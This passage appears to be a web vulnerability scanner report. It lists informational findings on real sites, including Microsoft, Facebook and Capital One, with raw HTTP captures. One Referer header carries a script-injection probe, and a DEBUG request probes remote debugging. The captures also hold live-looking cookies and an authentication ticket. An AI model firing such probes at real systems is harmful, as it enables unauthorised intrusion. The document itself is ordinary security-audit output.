Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Content-Length: 3098
Content-Type: application/x-javascript
Last-Modified: Tue, 19 Jul 2011 21:27:13 GMT
Accept-Ranges: bytes
ETag: "929f56a05a46cc1:1fea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO CNT COM CUR DEV DSP NAV OUR PSA PSD SAM STA TAI UNI"
Date: Thu, 21 Jul 2011 19:21:54 GMT
Connection: close

...var efficientFrontierImageSource = "http://pixel1350.everesttech.net/1350/p?ev_transid=<?TRANSID?>&ev_<?METRIC?>=1";

function EF_TrackArticlePageView() {
var strHref = window.location.href;
var strEfficientFrontier = '<img width="1" height="1" src="http://pixel1350.everesttech.net/1350/p?ev_transid=
...[SNIP]...
aceMetric(imgSource, "quiz_subscription");
GetImage(imgSource);

DebugAlert("EF_TrackNewsletterSignUpViaQuiz");
}

function EF_ReplaceTransId(source, value) {
return source.replace("<?TRANSID?>", value);
}

function EF_ReplaceMetric(source, value) {
return source.replace("<?METRIC?>", value);
}

13.8. http://www.microsoft.com/en-us/security_essentials/shared/templates/components/oneMscomBlade/oneMscomBlade.css previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.microsoft.com
Path:	/en-us/security_essentials/shared/templates/components/oneMscomBlade/oneMscomBlade.css

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /en-us/security_essentials/shared/templates/components/oneMscomBlade/oneMscomBlade.css HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E256ae1bee6f=1
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311189489524:ss=1311187844264; WT_NVR=0=/:1=en-us:2=en-us/security_essentials; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/20/2011 22:17:59&Microsoft.VisitStartDate=07/20/2011 21:50:50&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=17&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!; .ASPXANONYMOUS=fMYFXJ59zAEkAAAAMzdkNTY4ODYtYTQxMy00NzkwLTgxZWQtODU5MWI4ZWUzOTA4PXatpD9i2BnSn5tNUQIzlvHrVlU1; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet:1=:2=

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/css
Last-Modified: Wed, 20 Jul 2011 22:16:30 GMT
Accept-Ranges: bytes
ETag: "0b3c9ac2a47cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
VTag: 438488342500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:35:23 GMT
Content-Length: 14596

....mstHdr
{
width: 960px;
}

.mstHdr .mstHdr_PriRow, .mstHdr .mstHdr_SecRow
{
position: relative;
min-height: 26px;
_height: 26px;
padding-left: 10px;
padding-rig
...[SNIP]...

z-index: 998;
}

.mstHdr .mstHdr_PriRow a
{
text-decoration: none;
}

.mstHdr .mstHdr_SecRow
{
z-index: 996;
}

.mstHdr .mstHdr_SecRowBg
{
background-color: white; /*<%-- TODO: make configurable? --%>*/
}

.mstHdr .mstHdr_SecRow, .mstHdr .mstHdr_SecRow a:link, .mstHdr .mstHdr_SecRow a:visited, .mstHdr .mstHdr_SecRow a:active, .mstHdr .mstHdr_SecRow a:hover
{
color: #6a6a6a; /*<%-- TODO: make configurable? --%>*/
}

/*<%-- Header Section Defs --%>*/

.mstHdr .mstHdr_StaticSec11, .mstHdr .mstHdr_StaticSec12, .mstHdr .mstHdr_StaticSec13, .mstHdr .mstHdr_StaticSec14
{
min-height: 1px;
_height: 1px;
}

.mstHdr .mstHdr_StaticSec11
{
width: 89px; /*<%-- TODO: make configurable? --%>*/
}

.mstHdr .mstHdr_StaticSec12
{
width: 330px; /*<%-- TODO: make configurable? --%>*/
}

.mstHdr .mstHdr_StaticSec13
{
width: 340px;
}

.mstHdr .mstHdr_StaticSec14
{
width: 171px;
}

.mstHdr .mstHdr_StaticSec21
{
width: 100%; /*<%-- TODO: make configurable? --%>*/
}

.mstHdr .mstHdr_MenuItem, .mstHdr .mstHdr_MenuItemSignIn
{
float: left;
}

/*<%-- Menu Links --%>*/

.mstHdr .mstHdr_MenuLink
{
font-size: 62.5%;
_font-size:57%;
}

.mstHdr .mstHdr_MenuLink a
{
display: block;
padding: 0 7px;
}

.mstHdr .mstHdr_MenuLinkTxt, .mstHdr .m
...[SNIP]...
tHdr .selected .mstHdr_MenuLinkTxt, .mstHdr a:hover .mstHdr_MenuLinkDesc, .mstHdr .selected .mstHdr_MenuLinkDesc, .mstHdr span.mstLcp_DualLangSpan a.mstLcp_DualLangLink:hover
{
color: #ffea41; /*<%-- TODO: make configurable? --%>*/
}

.mstHdr .mstHdr_MenuLinkImg
{
background-position: 0px center;
background-repeat: no-repeat;
}

.mstHdr .mstHdr_AnimateDesc a:hover .mstHdr_MenuLinkImg, .mstHdr .selected .mstHdr
...[SNIP]...
Image div.mstHdr_MenuLinkImg, .mstHdr .mstHdr_HideMenuLinkText div.mstHdr_MenuLinkTxt
{
display: none;
}

.mstHdr .mstHdr_AnimateDesc div.mstHdr_MenuLinkDesc
{
display: block;
}

/*<%-- Header Flyout Defs --%>*/

.mstHdr .mstHdr_Flyout
{
display: none;
}

.mstHdr .mstHdr_mstHdr_FlyoutPosShown .mstHdr_Flyout
{
display: block;
}

.mstHdr .mstHdr_SecRow .mstHdr_Flyout
{
background-color: white; /*<%-- TODO: make configurable? --%>*/
}

.mstHdr .mstHdr_SecRow .mstHdr_Flyout, .mstHdr .mstHdr_SecRow .mstHdr_Flyout a:link, .mstHdr .mstHdr_SecRow .mstHdr_Flyout a:visited, .mstHdr .mstHdr_SecRow .mstHdr_Flyout a:active, .mstHdr .mstHdr_SecRow .mstHdr_Flyout a:hover
{
color: #6a6a6a; /*<%-- TODO: make configurable? --%>*/
}

.mstHdr .mstHdr_FlyoutBotStrip
{
width: 100%;
height: 5px;
background-color: #cccccc;
}

/*<%-- Header LocalePicker Defs --%>*/

div.mstHdr div.mstHdr_MenuItemLcp
{
_width: 100%;
*width: auto;
}

.mstHdr .mstHdr_MenuLinkAnchor
{
_width: 0em;
}

.mstHdr span.mstLcp_DualLangSpan
{
display: block
...[SNIP]...
div.mstLcp_WorldwideLinkEmpty
{
border-top: solid 0px;
margin-top: 0px;
padding-top: 0px;
}

.mstHdr .mstLcp_WorldwideLink a
{
clear: both;
white-space: nowrap;
}

/*<%-- Header LocalePicker Defs --%>*/

.mstHdr .mstHdr_SignInOut
{
font-size: 62.5%;
}

.mstHdr .mstHdr_SignInOut a#idPPScarab
{
display: block;
white-space: nowrap;
}

.mstHdr .mstHdr_SignInOut span#idSIT, .mst
...[SNIP]...

14. ASP.NET debugging enabled previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pshared.5min.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: pshared.5min.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Date: Thu, 21 Jul 2011 19:22:50 GMT
Server: PWS/1.7.3.3
X-Px: nc iad-agg-n27 ( origin)
Content-Length: 39
Access-Control-Allow-Origin: *
x-server: fmvl-m01
X-Powered-By: ASP.NET
Connection: close

Debug access denied to '/Default.aspx'.

15. Referer-dependent response previous next
There are 3 instances of this issue:

http://lifescript.us.intellitxt.com/intellitxt/front.asp
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

15.1. http://lifescript.us.intellitxt.com/intellitxt/front.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://lifescript.us.intellitxt.com
Path:	/intellitxt/front.asp

Request 1

Response 1

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AKdo0GgCJUYDq4t2/GN0I5MAADtIAAA7hAIAAAExTiWzMgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Mon, 19-Sep-2011 19:21:58 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11050
Date: Thu, 21 Jul 2011 19:21:58 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggingOn:function()
{return false;},hilite:function()
{}}}
itxtFeedback=function()
{};
if('undefined'==typeof $iTXT){$iTXT={};};document.itxtDisabled=1;
if(document.itxtDisabled)
{document.itxtInProg=1;
if(!$iTXT.cnst){$iTXT.cnst={};}
if(!$iTXT.debug){$iTXT.debug={};}
if(!$iTXT.glob){$iTXT.glob={track:{}};}
if(!$iTXT.js){$iTXT.js={};}
if(!$iTXT.tmpl){$iTXT.tmpl={};}
if(!$iTXT.tmpl.js){$iTXT.tmpl.js={};}
if(!$iTXT.tmpl.components){$iTXT.tmpl.components={};}
if(!$iTXT.core){$iTXT.core={};};

if(!$iTXT.data){$iTXT.data={};};

if(!$iTXT.debug){$iTXT.debug={};};

if(!$iTXT.fx){$iTXT.fx={};};

if(!$iTXT.itxt){$iTXT.itxt={};};

if(!$iTXT.metrics){$iTXT.metrics={};};

if(!$iTXT.tmpl){$iTXT.tmpl={};};

if(!$iTXT.ui){$iTXT.ui={};};

document.itxtIsReady=0;
$iTXT.js.exclCont=function()
{try
{var d=document.getElementById('itxtexclude');if(null==d)
{var b=document.getElementsByTagName('body')[0];d=document.createElement('div');d.id='itxtexclude';b.insertBefore(d,b.firstChild);}
return d;}catch(x){};};$iTXT.js.load=function(src)
{if('string'!=typeof src||!src.match(/^http/))
{return;};try
{var e=document.createElement('script');e.src=src;e.type='text/javascript';var d=$iTXT.js.exclCont();d.insertBefore(e,d.firstChild);}catch(x){};};$iTXT.js.loadCss=function(src,id){try
{var ss=document.createElement('link');ss.id=id;ss.href=src;ss.type='text/css';ss.rel='stylesheet';var d=$iTXT.js.exclCont();d.insertBefore(ss,d.firstChild);}catch(x){}};if(!$iTXT.js.loader){$iTXT.js.loader={};}
$iTXT.js.libPath='http://images.intellitxt.com/ast/js/vm/jslib/';$iTXT.js.loadLib=function(libName,className)
{var lib='$iTXT.'+libName+'.'+className;var path=$iTXT.js.libPath+libName+'/'+className.toLowerCase()+'.js';if('undefined'==typeof($iTXT.js.loader[lib]))
{$iTXT.js.loader[lib]=false;};};$iTXT.js.check=function()
{if(!document.itxtIsReady)
{return window.setTimeout($iTXT.js.check,100);}
var error=0;for(var libName in $iTXT.js.loader)
{if(!$iTXT.js.loader[libName])
{error=1;break;};}
if(error)
{window.setTimeout($iTXT.js.check,100);}
else
{var currentLibName='Unkown';try
{for(var li
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AKdo0GgCJUYDq4t2/GN0I5MAADtIAAA7hAIAAAExTiXjRQA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Mon, 19-Sep-2011 19:22:11 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Content-Length: 282
Date: Thu, 21 Jul 2011 19:22:11 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggingOn:function()
{return false;},hilite:function()
{}}}
itxtFeedback=function()
{};

15.2. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?action=like&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df161ee90c6d315c%26origin%3Dhttp%253A%252F%252Fwww.betabeat.com%252Ffd4fffe9c02b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.betabeat.com%2F2011%2F07%2F19%2Ffever-pitch-new-yorkers-go-starry-eyed-for-start-ups%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response 1

Request 2

GET /plugins/like.php?action=like&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df161ee90c6d315c%26origin%3Dhttp%253A%252F%252Fwww.betabeat.com%252Ffd4fffe9c02b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.betabeat.com%2F2011%2F07%2F19%2Ffever-pitch-new-yorkers-go-starry-eyed-for-start-ups%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response 2

15.3. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response 1

Request 2

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response 2

16. Cross-domain POST previous next
There are 8 instances of this issue:

http://corp.klout.com/contact
http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/
http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/
http://www.treehugger.com/daylife/related/72065.html
http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
http://www.treehugger.com/galleries/
http://www.treehugger.com/science_technology/
http://www.treehugger.com/travel_nature/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

16.1. http://corp.klout.com/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corp.klout.com
Path:	/contact

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

oid
retURL
first_name
last_name
email
phone
company
00NA0000003u0P5
00NA0000003u0P5
00NA0000003u0P5
00NA0000003u0P5
submit

Request

GET /contact HTTP/1.1
Host: corp.klout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: useBeta=1; forcedBeta=1; arrival_cookie=98b56134fc99bed15f2fd5a80818ad795283fd8c129697d9e64225945a634518a599f407fbb43ecf4a658b9ddf1a7db104c0d63b0746cfa03aaae1ab863abc117bdbb02d3db71de68697ce8ebe3b140cc694f4b6b9ac4bf3e11f81dffb4fbe1533cd73f68e028d22f98ab3055e53149c2adff152894de28de8dcf45425320dd945ad7c826560b357796ca6dc6d533ba78ba27924bdfc3a27ae4551253c31a845794d816ada889934d5f388625fc9e08a450fa5909e6636d6f9b6142468d27d5d3cc846223b4e70019c67a324da173d7e2040d7a91ae12b06d845ee0ecfc1a68b; __qca=P0-2053982506-1311432752930; __unam=c3eadea-131577bf952-48e618ce-1; __utma=41932592.1896073895.1311432768.1311432768.1311432768.1; __utmb=41932592.1.10.1311432768; __utmc=41932592; __utmz=41932592.1311432768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261428178.226286795.1311432753.1311432753.1311432753.1; __utmb=261428178.8.10.1311432753; __utmc=261428178; __utmz=261428178.1311432753.1.1.utmcsr=klout.com|utmccn=(referral)|utmcmd=referral|utmcct=/home; WRUID=0; _chartbeat2=t4l7yjjkeowrdz3v

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 14:53:16 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Vary: Accept-Encoding
Content-Length: 10024
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Klout</t
...[SNIP]...
<div id="partnerform" style="display:none">
<form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="POST">

<input type=hidden name="oid" value="00DA0000000ZS8H">
...[SNIP]...

16.2. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailymarkets.com
Path:	/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

email
url
title
loc

Request

GET /stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/ HTTP/1.1
Host: www.dailymarkets.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/url?sa=t&source=web&cd=1&ved=0CCIQFjAA&url=http%3A%2F%2Fwww.dailymarkets.com%2Fstock%2F2011%2F07%2F20%2Fjack-henry-associates-to-offer-microsoft-productivity-software-via-subscription%2F&rct=j&q=Jack%20Henry%20financial%20services%20software&ei=f3goTq7QCMur0AHop_ToCg&usg=AFQjCNEPJxCYFmrW7vAKIB0qLtE7FJf5iw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:05:40 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding,Cookie
Last-Modified: Thu, 21 Jul 2011 01:14:52 GMT
ETag: "28a4-4a88a13717b00"
Accept-Ranges: bytes
Content-Length: 50686
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Thu, 21 Jul 2011 19:05:40 GMT
X-Pingback: http://www.dailymarkets.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.4b
Pragma: public
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile
...[SNIP]...
<div style="margin:auto;"><form onsubmit='function onsubmit(event) { window.open("http://www.feedburner.com/fb/a/emailverifySubmit?feedId=531073", "popupwindow", "scrollbars=yes,width=550,height=520"); return true;}' target="popupwindow" method="post" action="http://www.feedburner.com/fb/a/emailverify" > <input onfocus="if(this.value=='E-mail address') {this.value=''; $j('.email-sub-box .input-txt').addClass('input-txt-selected')}" type="text" name="email" value="E-mail address" class="input-txt" />
...[SNIP]...

16.3. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailymarkets.com
Path:	/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

email
url
title
loc

Request

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:05:40 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding,Cookie
Last-Modified: Thu, 21 Jul 2011 01:14:52 GMT
ETag: "28a4-4a88a13717b00"
Accept-Ranges: bytes
Content-Length: 50686
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Thu, 21 Jul 2011 19:05:40 GMT
X-Pingback: http://www.dailymarkets.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.4b
Pragma: public
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile
...[SNIP]...
<div style="padding:0px;margin:0px;"><form onsubmit='function onsubmit(event) { window.open("http://www.feedburner.com/fb/a/emailverifySubmit?feedId=531073", "popupwindow", "scrollbars=yes,width=550,height=520"); return true;}' target="popupwindow" method="post" action="http://www.feedburner.com/fb/a/emailverify" style=" text-align: center;"> <input type="text" name="email" style="width: 140px; border: 1px solid #000; margin-top:10px;" />
...[SNIP]...

16.4. http://www.treehugger.com/daylife/related/72065.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.treehugger.com
Path:	/daylife/related/72065.html

Response

17. SSL cookie without secure flag set previous next
There are 2 instances of this issue:

https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx
https://servicing.capitalone.com/c1/login.aspx

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

17.1. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/OAO/initiation.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

AuthenticationTicket=7E9AD15C6E2116D88D183D67C57A26C20820E54D245A0F8AE9840139E5BEF5ACCFCE3D1B7C44B021FEC9F130A4FEE27534778E3F63A7BBB4A0E9B46D87155881050AD326A5E1FEA27E77F2A92F11027DAFACABBA5E303B12279F104B5C246347A77571A7E5BF553780E182CEA81B9EC49B6B23AD7C1ABCC95C0A4DDA53B5CE8688AB3805777F777C4AD1123C339B404D0BCEB68C558A073F427B9AA2788AC4554799BD61BC6FF4A57B9D65FDFCF84BCC79ED17C0750A8769FF23C151F14BF9A99B0A1BBF7B7FCD6355DF8BFDE5D745DBFD0649E7F304781D462B7921; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.2. https://servicing.capitalone.com/c1/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://servicing.capitalone.com
Path:	/c1/login.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ssotgt=f2eos; domain=capitalone.com; path=/;HttpOnly
VS_COOKIE=Login; domain=capitalone.com; path=/;HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

18. Cross-domain Referer leakage previous next
There are 193 instances of this issue:

http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911
http://a.fsdn.com/con/css/sf.min.css
